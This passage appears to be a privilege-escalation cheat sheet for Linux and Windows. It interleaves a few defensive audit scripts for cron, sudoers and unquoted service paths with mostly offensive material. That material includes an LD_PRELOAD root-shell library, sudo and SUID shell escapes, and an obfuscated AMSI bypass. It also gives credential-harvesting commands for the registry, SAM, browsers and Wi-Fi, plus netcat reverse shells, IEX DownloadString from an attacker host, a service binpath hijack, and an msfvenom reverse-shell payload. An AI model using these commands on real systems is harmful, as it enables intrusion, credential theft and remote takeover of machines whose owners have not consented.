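        $1 ~ /^@/                            { if ($2 == who) print $3; next }
        $6 == who                            { print $7 }
    ' "$1"
}

# audit_root_cron FILE: one "REASON<TAB>path" line per problem found.
audit_root_cron() {
    root_cron_scripts "$1" | while IFS= read -r script; do
        case "$script" in
            /*) ;;
            *)  printf 'RELATIVE_PATH\t%s\n' "$script"; continue ;;   # resolved via the PATH cron sets
        esac
        if [ ! -e "$script" ]; then
            printf 'MISSING\t%s\n' "$script"          # anyone who can write the directory can create it
        elif find "$script" -maxdepth 0 -perm /022 | grep -q .; then
            printf 'WRITABLE\t%s\n' "$script"         # group- or world-writable script
        fi
        dir=$(dirname "$script")
        # world-writable parent without the sticky bit: the script can be replaced
        if [ -d "$dir" ] && find "$dir" -maxdepth 0 -perm -o=w ! -perm -1000 | grep -q .; then
            printf 'WRITABLE_DIR\t%s\n' "$script"
        fi
    done
}

# Constructed crontab and scripts under a temp dir; prints the crontab path.
demo_setup() {
    t=$(mktemp -d)
    mkdir -p "$t/opt" "$t/usr/local/bin" "$t/tmp"
    chmod 0755 "$t/opt" "$t/usr/local/bin"
    chmod 0777 "$t/tmp"                                   # like /tmp without the sticky bit
    printf '#!/bin/sh\necho monitor\n' > "$t/opt/monitor.sh";          chmod 0777 "$t/opt/monitor.sh"
    printf '#!/bin/sh\necho backup\n'  > "$t/usr/local/bin/backup.sh"; chmod 0755 "$t/usr/local/bin/backup.sh"
    {
        echo 'SHELL=/bin/sh'
        echo '# m h dom mon dow user command'
        echo "*/5 * * * * root $t/opt/monitor.sh"
        echo "0 3 * * * root $t/usr/local/bin/backup.sh --full"
        echo "@reboot root $t/tmp/startup.sh"
        echo "* * * * * nobody $t/opt/monitor.sh"
    } > "$t/crontab"
    printf '%s\n' "$t/crontab"
}

if [ $# -eq 0 ]; then
    C=$(demo_setup)
    audit_root_cron "$C"
    rm -rf "$(dirname "$C")"
else
    audit_root_cron "$1"
fi
```

Per-user crontabs (crontab -l, /var/spool/cron) have no user field, so for those the root check is simply "is this root's crontab"; the file and directory checks apply unchanged.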
LD_Preload
In some circumstances, you may be able to abuse certain services that run via LD_Preload.
Run:
sudo -l
If env_keep+=LD_PRELOAD is seen:
Make a C script named "shell" or whatever you want
nano shell.c
Place the following code in the script:
```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the shared object is loaded by a sudo'd program */
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-triggering in the child shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```
Compile the shell
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
Take a look at what system services are being preloaded. For instance, if you see apache2, then you would do a sudo preload for apache2, escalating your current shell to a root-level shell:
sudo LD_PRELOAD=/home/user/shell.so apache2

Bash SUID
This one absolutely blew my mind; I used it recently. If you find a private SSH key, and you can log in with it, check for a Bash SUID. If you have it, you might be able to escalate during authentication!
ssh -i id_rsa user@ip bash -p

Lua Privilege Escalation
This is another one of those strange one-off scenarios. I had a script that allowed me to drop into a little command prompt and run different commands as root (but most of them would just print the word "nil"). I had no idea what was happening. After a little research, I found out that nil was Lua's version of null (basically the error was telling me that it was attempting to use Lua commands but the commands used did not exist) and the prompt I was using was some sort of Lua script. Jokingly, I typed the following:
os.execute('/bin/sh')
I was root!!

Sudo Bypass
I noticed the following entry [(ALL, !root) /bin/bash] upon running:
sudo -l
I had root permissions to run bash, an obvious win! Attempting to run it as the root user would not work.
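Three of the sudo findings on this page come straight out of the sudoers file: the NOPASSWD entry for nmap, env_keep passing LD_PRELOAD through, and a runas spec like the (ALL, !root) entry just mentioned. The script below is an added example, not from the post, that flags those three patterns in sudoers syntax (what "sudo -l" is derived from), so it is meant to be run by root over /etc/sudoers and /etc/sudoers.d/*. It goes one step beyond the page by also treating LD_LIBRARY_PATH in env_keep as a loader variable, since it can pull in a user-controlled library the same way; the sample file written by sample_sudoers() is constructed.

```shell
#!/bin/sh
# Added example (not from the post): flag the sudoers patterns that the
# techniques on this page depend on. It reads sudoers syntax (what
# "sudo -l" is derived from), so run it as root against /etc/sudoers and
# /etc/sudoers.d/*, or against a copy. sample_sudoers() writes a
# constructed file. Beyond the page it also treats LD_LIBRARY_PATH in
# env_keep as a loader variable.

# audit_sudoers FILE: print "FINDING<TAB>line" for each risky entry.
audit_sudoers() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        # env_keep passing a dynamic-loader variable through to the command
        /^Defaults/ && /env_keep/ && /LD_PRELOAD|LD_LIBRARY_PATH/ {
            print "ENV_KEEP_LOADER\t" $0; next
        }
        # commands that run without the invoking user re-authenticating
        /NOPASSWD:/ { print "NOPASSWD\t" $0 }
        # runas spec that excludes a user, e.g. (ALL, !root): the rule still
        # grants every other uid, which is what the Sudo Bypass entry abuses
        /\([^)]*![^)]*\)/ { print "NEGATED_RUNAS\t" $0 }
    ' "$1"
}

# Constructed sudoers sample covering the patterns above plus ordinary
# rules that should produce no finding.
sample_sudoers() {
    cat > "$1" <<'EOF'
# constructed sample, not a real host's sudoers
Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
alice ALL=(ALL) NOPASSWD: /usr/bin/nmap
bob ALL=(ALL, !root) /bin/bash
carol ALL=(ALL) /usr/bin/systemctl restart apache2
EOF
}

if [ $# -eq 0 ]; then
    F=$(mktemp); sample_sudoers "$F"; audit_sudoers "$F"; rm -f "$F"
else
    for f in "$@"; do audit_sudoers "$f"; done
fi
```

A NOPASSWD line is not a finding by itself; what matters is whether the listed program can spawn a shell or read arbitrary files, which is why the output keeps the full line for review rather than just the user.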
A quick Google search helped me understand that it was a sudo privilege escalation bypass:
sudo -u#-1 /bin/bash

Tar SUID
If you find a Tar SUID assigned to your current user, it's an easy win:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

TMUX Session Running as Root
I cannot express how many times this one has been overlooked. I've legitimately exploited 5+ systems in CTF-like environments with this gem. If you see a TMUX session running as root, look at the path. Typically, I've seen the session running under /.devs/dev_sess. This can be identified using:
ps -aux | grep tmux
If you see that, and a session is active as the root user, attempt an easy win:
tmux -S /.devs/dev_sess
If it works, check your privs! You might just be root.

NMAP SUID
Yes, another exceedingly simple win:
nmap --interactive
!sh

Systemctl SUID
Identifying this beauty represents yet another win. Run each one of these commands in order:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF

Copy SUID
Noticing the 'cp' command with SUID assigned to your user account could allow you to overwrite the passwd file of the victim system, giving yourself root permissions:
Open up a terminal on your attacking machine and create a salted password:
openssl passwd -1 -salt roflroot pass123
Copy your attacking machine's local passwd file to have something to edit:
cp /etc/passwd /root/Exploits
Host an HTTP server:
python -m SimpleHTTPServer 8000
Navigate to the /tmp directory on the victim host machine (or somewhere you have write permissions) and download the passwd file:
wget http://192.168.119.221:8000/passwd
Copy the passwd file to /etc/passwd:
cp passwd /etc/passwd
Switch to your created user:
su roflroot

Windows Privilege Escalation – Credentials Harvesting
Windows systems and applications often store clear text, encoded or hashed credentials in files, registry
keys or in memory. When gaining initial access to a Windows machine and performing privilege escalation enumeration steps, passwords can often be found through these means and used to further escalate privileges.

Finding passwords in files:
One of the first things to do is to search for files containing the "password" string, as this could help in identifying hidden credentials:
findstr /si password *.xml *.ini *.txt *.config 2>nul
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /spin "password" *.*
Check .config or other interesting file types for those strings:
dir /s *pass* == *cred* == *vnc* == *.config*
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Older versions of Windows, when performing unattended installations, used text files to store answers to questions that come up during the installation process, some of which contained clear text credentials:
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Additionally, the Windows.old directory may contain sensitive files, such as registry hives, that could be storing passwords.

VNC Credentials
VNC is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol to remotely control another computer. This protocol often stored clear-text user credentials in text files:
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

Credentials Stored in the Registry
The Windows registry often stores clear-text or encoded passwords used by various applications.
Below are a few examples:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Check for SAM and SYSTEM files access
The Security Account Manager (SAM) is used to store users' passwords in encrypted form. They are stored in a registry hive as LM or NTLM hashes. They can be found in the following locations:
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Common Web Configuration Files
Web applications might store clear-text or encoded credentials in text files. The Inetpub folder is the default folder for Microsoft IIS and, if present, it is likely to contain confidential information. Some example commands are:
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Web Logs
Apache, Tomcat and IIS have logs that are used to store user access to a web application and any errors that may have occurred in the web application. These are usually stored in these locations:
dir /s access.log error.log
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log

Cached & Saved Credentials
Windows often uses applications such as the Windows Vault to store login credentials for servers and sites.
Cmdkey is a command used to create, list and delete stored user names, passwords or credentials. The below can be used to list saved credentials:
cmdkey /list
Once verifying that credentials are stored in the system, the runas command can be used with the /savecred flag to execute commands as another user using the saved credentials:
runas /savecred /user:WORKGROUP\Administrator "\\10.10.10.10\SHARE\evil.exe"
runas can also be used by providing user credentials:
• C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe"
or
• $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force
• $mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd)
• $computer = ""
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe", " 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

Windows Credential Store
The Windows Credential Store is a feature of Windows that saves usernames, passwords, and certificates for systems, websites, and servers. The Credential Manager stores two types of credentials: Web and Windows. There are two PowerShell scripts that can help harvest this data:
Gathering Web Credentials:
https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1
Windows Credentials:
https://github.com/peewpw/Invoke-WCMDump/blob/master/Invoke-WCMDump.ps1

Group Policy Preferences (GPP Passwords)
If the box is part of a domain and the current user has access to read System Volume Information, this can help find passwords stored in files. Start by checking the environment variables for the IP address of the domain controller.
Output environment variables with the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=WHATEVER.LOCAL
Then look up the IP address
nslookup nameofserver.whatever.local
Mount the volume and search for the groups.xml file
net use z: \\192.168.1.101\SYSVOL
z:
dir Groups.xml /s
Otherwise, these can be found in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history, by looking for:
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
The next step is to decrypt the passwords using the gpp-decrypt tool. You can also do this with PowerView and the Get-GPPPassword script. Using PowerShell to load them into memory:
IEX(New-Object Net.WebClient).DownloadString("http://10.0.0.100/Get-GPPPassword.ps1")
IEX(New-Object Net.WebClient).DownloadString("http://10.0.0.100/powerview.ps1")
Then run the Get-GPPPassword tool and feed any listed passwords to PowerView. This will check any found credentials against other machines.
Get-NetOU -GUID "{4C86DD57-4040-41CD-B163-58F208A26623}" | %{ Get-NetComputer -ADSPath $_ }
Visit https://www.toshellandback.com/2015/08/30/gpp/ for more info.

Services and Applications Storing Credentials
Applications that are used to access systems or services remotely, such as Remmina, PuTTY, RDP, FileZilla etc., often store passwords in memory or in files. These can be retrieved using SessionGopher:
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\stef -p password
Lazagne can also be used to extract credentials from many applications.

Credentials Stored in Browsers
Browsers such as Google Chrome, Firefox, Microsoft Edge etc. can often store passwords when authentication to a website is performed.
Lazagne is an open source application used to retrieve passwords stored on a local computer, and one of its many functions is to retrieve passwords stored in internet browsers.
Command : Description
laZagne.exe all : Launch all modules
laZagne.exe browsers : Launch only a specific module
laZagne.exe browsers -firefox : Launch a specific software script
laZagne.exe -h / laZagne.exe browsers -h : Get help
laZagne.exe all -vv : Change verbosity mode (2 different levels)
Additionally, the following Metasploit modules can also be used:
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
use post/windows/gather/enum_ie

Saved RDP Connections
RDP has the ability to save connection information (such as passwords) in the registry. They can be found at the following registry keys:
HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\
HKCU\Software\Microsoft\Terminal Server Client\Servers\

PowerShell Command History
Commands executed using PowerShell are stored in a history file (similar to the .bash_history file in Linux). If clear-text credentials were entered when issuing a command, this could be exploited by accessing the history file:
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Wi-Fi Credentials
Command : Description
netsh wlan show profile : List available AP SSIDs
netsh wlan show profile key=clear : Get the clear-text password
One-liner to dump every profile's SSID, cipher and key:
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.)
& @echo on

Additional Metasploit Modules
There are certain Metasploit modules that aim to find clear-text or encoded credentials on a target system:
use post/windows/gather/credentials/gpp
use post/windows/gather/credential_collector
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
use post/windows/gather/enum_ie
use post/multi/gather/filezilla_client_cred
use post/multi/gather/firefox_creds
use post/multi/gather/irssi_creds
use post/multi/gather/lastpass_creds
use post/multi/gather/maven_creds
use post/multi/gather/netrc_creds
use post/multi/gather/pidgin_cred
use post/multi/gather/rsyncd_creds
use post/multi/gather/ssh_creds
use post/multi/gather/thunderbird_creds
Automated enumeration scripts will also perform credential harvesting, although it's always best to do this manually.

Vim is a very versatile text editor which has many awesome functionalities, including the ability to open a shell inside it. So, to open vim as root we can use the following command:
sudo vi test.sh
As soon as you execute it, a vi window will open. Now you need to switch into command mode; you can do that by pressing the ESC key. In command mode, use the :!bash command; this will open a root shell.
There is one more shortcut which you can use when you have access to vim: you can use the following command to trigger the root shell using vim.
sudo vi -c '!bash'

Domain Enumeration:
Enumerate Domain:
- Users
- Computers
- Domain Administrators
- Enterprise Administrators
- Shares

Script Bypass:
powershell -ep bypass
Bypass AMSI:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."getfiElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sETVaLUE"( ${nULl},${tRuE} )

PowerView:
. .\PowerView.ps1
Get-NetUser
List property of all users:
Get-NetUser | select -ExpandProperty samaccountname
Enumerate member computers:
Get-NetComputer
Attributes of Domain Admins group:
Get-NetGroup -GroupName "Domain Admins" -FullData
Enumerate members of Domain Admins group:
Get-NetGroupMember -GroupName "Domain Admins"
Enumerate members of Enterprise Admins group:
Get-NetGroupMember -GroupName "Enterprise Admins"
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain xxxx.local
Find interesting shares:
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose

ENUMERATING GPO & ENUMERATE RESTRICTED GROUPS from GPO:
Get-NetGPOGroup -Verbose
Look for memberships of the group "RDPUsers":
Get-NetGroupMember -GroupName RDPUsers
List all the OUs:
Get-NetOU
List all computers in a specific OU:
Get-NetOU LockedMachines | %{Get-NetComputer -ADSPath $_}
List GPOs:
Get-NetGPO
Enumerate GPO applied in a specific OU:
(Get-NetOU LockedMachines -FullData).gplink
[LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=lockedcorp,DC=lockedcorp,DC=local;0]
Get-NetGPO -ADSpath 'LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=lockedcorp,DC=lockedcorp,DC=local'

ENUMERATING ACLS
Enumerate ACLs with PowerView:
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs -Verbose
Enumerate ACLs of Domain Admins group:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs -Verbose
Enumerate ACLs for all GPOs:
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Enumerate GPOs for a user or the RDPUsers group:
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ?{$_.IdentityReference -match "user"}
Check for modify rights/permissions:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "student"}
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
ENUMERATE TRUSTS:
Enumerate ALL domains:
Get-NetForestDomain -Verbose
Map the trusts of the domain:
Get-NetDomainTrust
Map all trusts of the forest:
Get-NetForestDomain -Verbose | Get-NetDomainTrust
List only external trusts:
Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}
Identify external trusts of the domain:
Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}
If the trust is bi-directional, try to extract info from the forest:
Get-NetForestDomain -Forest lockercorp.local -Verbose | Get-NetDomainTrust

# Basics
systeminfo
hostname
# Who am I?
whoami
echo %username%
# What users/localgroups are on the machine?
net users
net localgroup
# More info about a specific user. Check if user has privileges.
net user user1
# View Domain Groups
net group /domain
# View Members of Domain Group
net group /domain
# Firewall
netsh firewall show state
netsh firewall show config
# Network
ipconfig /all
route print
arp -A
# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn

Cleartext Passwords
Search for them:
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
# Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
# Find all passwords in all files.
findstr /spin "password" *.*
In Files
These are common files to find them in. They might be base64-encoded, so look out for that.
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
In Registry
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Sometimes there are services that are only accessible from inside the network:
netstat -ano
Scheduled Tasks:
Here we are looking for tasks that are run by a privileged user and run a binary that we can overwrite.
schtasks /query /fo LIST /v
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Change the upnp service binary:
sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
Weak Service Permissions:
WMIC
wmic service list brief
Here is a POC code for getsuid.
#include <stdlib.h>

int main()
{
    int i;
    /* Runs with the privileges of the service that executes this binary */
    i = system("net localgroup administrators theusername /add");
    return 0;
}
We then compile it with mingw like this:
i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
Restart the Service:
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using wmic or net the following way:
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Migrate the meterpreter shell:
If your meterpreter session dies right after you get it, you need to migrate it to a more stable process. A common process to migrate to is winlogon.exe, since it is run by SYSTEM and it is always running.
You can find the PID like this:
wmic process list brief | find "winlogon"
So when you get the shell you can either type migrate PID or automate this so that meterpreter migrates automatically.
http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html
Unquoted Service Paths:
Find Services With Unquoted Paths
# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
# Using sc
sc query
sc qc [service name]
# Look for BINARY_PATH_NAME and see if it is unquoted.
Exploit It
If the path to the binary is:
c:\Program Files\something\winamp.exe
We can place a binary like this:
c:\program.exe
When the program is restarted it will execute the binary program.exe, which we of course control. We can do this in any directory that has a space in its name, not only Program Files. If the path contains a space and is not quoted, the service is vulnerable. This attack is explained here:
http://toshellandback.com/2015/11/24/ms-priv-esc/
There is also a metasploit module for this:
exploit/windows/local/trusted_service_path
Vulnerable Drivers
Some driver might be vulnerable. I don't know how to check this in an efficient way.
# List all drivers
driverquery
AlwaysInstallElevated:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
http://toshellandback.com/2015/11/24/ms-priv-esc/
Group Policy Preference:
If the machine belongs to a domain and your user has access to System Volume Information there might be some sensitive files there. First we need to map/mount that drive. In order to do that we need to know the IP address of the domain controller.
We can just look in the environment variables:
# Output environment variables
set
# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=WHATEVER.LOCAL
# Look up the IP address
nslookup nameofserver.whatever.local
# It will output something like this:
Address: 192.168.1.101
# Now we mount it
net use z: \\192.168.1.101\SYSVOL
# And enter it
z:
# Now we search for the Groups.xml file
dir Groups.xml /s
If we find the file with a password in it, we can decrypt it like this in Kali:
gpp-decrypt encryptedpassword
Other Group Policy Preference files, and the elements in them that may carry a cpassword:
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
Escalate to SYSTEM from Administrator
On Windows XP and Older:
If you have a GUI with a user that is included in the Administrators group, you first need to open up cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened as a normal user, and if you right-click and do Run as Administrator you might need to know the Administrator's password, which you might not know. So instead you open up the cmd from c:\windows\system32\cmd.exe. This will give you a cmd with Administrator rights. From here we want to become the SYSTEM user. To do this we run:
# First we check what time it is on the local machine:
time
# Now we set the time we want the SYSTEM cmd to start. Probably one minute after the current time.
at 01:23 /interactive cmd.exe
And then the cmd with SYSTEM privs pops up.
Vista and Newer
You first need to upload PsExec.exe and then you run:
psexec -i -s cmd.exe
Kitrap
On some machines the at 20:20 trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute vdmallowed.exe. I think it only works with a GUI.
vdmallowed.exe
vdmexploit.dll
Using Metasploit
So if you have a metasploit meterpreter session going you can run getsystem.
Post modules
Some interesting metasploit post-modules. First you need to background the meterpreter shell and then you just run the post modules.
use exploit/windows/local/service_permissions
run post/windows/gather/credentials/gpp
run post/windows/gather/credential_collector
run post/multi/recon/local_exploit_suggester
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/checkvm
Windows Privilege Escalation Methods
Method #1: Metasploit getsystem (From local admin to SYSTEM)
To escalate privileges from local administrator to the SYSTEM user:
meterpreter> use priv
meterpreter> getsystem
getsystem uses three methods to achieve that: the first two use named pipe impersonation and the third one uses token duplication.
Method #2: Unquoted Service Paths
It happens when a developer fails to enclose the file path to a service in quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability.
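As an added example (not from the original page), the path-probing behaviour this method relies on can be turned into an audit: the Python below parses constructed output in the shape of `wmic service get name,pathname,startmode /format:csv`, flags auto-start services whose unquoted path contains spaces outside C:\Windows, and lists the intermediate file names Windows would try first, which are exactly the locations whose parent directories a defender should check with icacls for unprivileged write access. The service names and paths in the sample are made up.

```python
"""Audit unquoted service paths from wmic CSV output (added example)."""
import csv
import io
import re
from typing import Dict, List

_EXE = re.compile(r"\.exe", re.IGNORECASE)


def _binary_part(image_path: str) -> str:
    """Everything up to and including the first '.exe'; the rest is arguments."""
    m = _EXE.search(image_path)
    return image_path[: m.end()] if m else image_path


def unquoted_search_candidates(image_path: str) -> List[str]:
    """Return the executables Windows probes for an unquoted path, in order.

    For 'C:\\A B\\C D\\svc.exe' the loader tries 'C:\\A.exe', then
    'C:\\A B\\C.exe', and only then the real 'C:\\A B\\C D\\svc.exe'.
    """
    binary = _binary_part(image_path.strip())
    parts = binary.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(binary)
    return candidates


def is_unquoted_vulnerable(image_path: str) -> bool:
    """Unquoted, contains a space, and not under the C:\\Windows tree."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    binary = _binary_part(p)
    if " " not in binary:
        return False
    return not binary.lower().startswith("c:\\windows\\")


def find_unquoted_services(wmic_csv: str) -> Dict[str, List[str]]:
    """Map each vulnerable auto-start service to the paths an attacker could
    plant (every probed name except the genuine binary)."""
    # wmic /format:csv prefixes rows with the node name; strip() drops the
    # blank first line wmic emits.
    reader = csv.DictReader(io.StringIO(wmic_csv.strip()))
    findings: Dict[str, List[str]] = {}
    for row in reader:
        if (row.get("StartMode") or "").strip().lower() != "auto":
            continue
        path = row.get("PathName") or ""
        if is_unquoted_vulnerable(path):
            findings[row["Name"]] = unquoted_search_candidates(path)[:-1]
    return findings


# Constructed sample in wmic CSV layout (not captured from a real host).
SAMPLE_WMIC_CSV = "\n".join([
    r'Node,Name,PathName,StartMode',
    r'HOST1,GoodSvc,"""C:\Program Files\Vendor App\svc.exe""",Auto',
    r'HOST1,BadSvc,C:\Program Files\Some Folder\Config files\Service.exe,Auto',
    r'HOST1,ManualSvc,C:\Program Files\Other Tool\tool.exe,Manual',
    r'HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto',
    r'HOST1,ArgSvc,C:\Program Files\Agent\agent.exe -service,Auto',
])

if __name__ == "__main__":
    for name, spots in find_unquoted_services(SAMPLE_WMIC_CSV).items():
        print(name)
        for spot in spots:
            print("   Windows would probe:", spot)
```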
C:\Program Files\Some Folder\Config files\Service.exe
Windows would try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Config.exe
C:\Program Files\Some Folder\Config files\Service.exe
So if we have write access on some target directory we can write a file in that directory:
icacls "C:\Program Files\Some Folder"
Search for:
BUILTIN\Users:(OI)(CI)(M)
(M) stands for Modify for (unprivileged) users.
For a full description of the icacls output:
icacls preserves the canonical order of ACE entries as:
Explicit denials
Explicit grants
Inherited denials
Inherited grants
Perm is a permission mask that can be specified in one of the following forms:
A sequence of simple rights:
F (full access)
M (modify access)
RX (read and execute access)
R (read-only access)
W (write-only access)
A comma-separated list in parentheses of specific rights:
D (delete)
RC (read control)
WDAC (write DAC)
WO (write owner)
S (synchronize)
AS (access system security)
MA (maximum allowed)
GR (generic read)
GW (generic write)
GE (generic execute)
GA (generic all)
RD (read data/list directory)
WD (write data/add file)
AD (append data/add subdirectory)
REA (read extended attributes)
WEA (write extended attributes)
X (execute/traverse)
DC (delete child)
RA (read attributes)
WA (write attributes)
Inheritance rights may precede either Perm form, and they are applied only to directories:
(OI): object inherit
(CI): container inherit
(IO): inherit only
(NP): do not propagate inherit
(I): permission inherited from parent container
To know under which account the service is running (hopefully as SYSTEM):
wmic service get name,startname
Then we trojanize the service:
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=$IP LPORT=443 -f exe -o Config.exe
And copy it to the folder we can write in:
copy Config.exe "C:\Program Files\Some Folder\"
And sit and wait for the machine to be rebooted, OR:
shutdown /r /t 0
From metasploit:
msf> use exploit/windows/local/trusted_service_path
To exploit it manually:
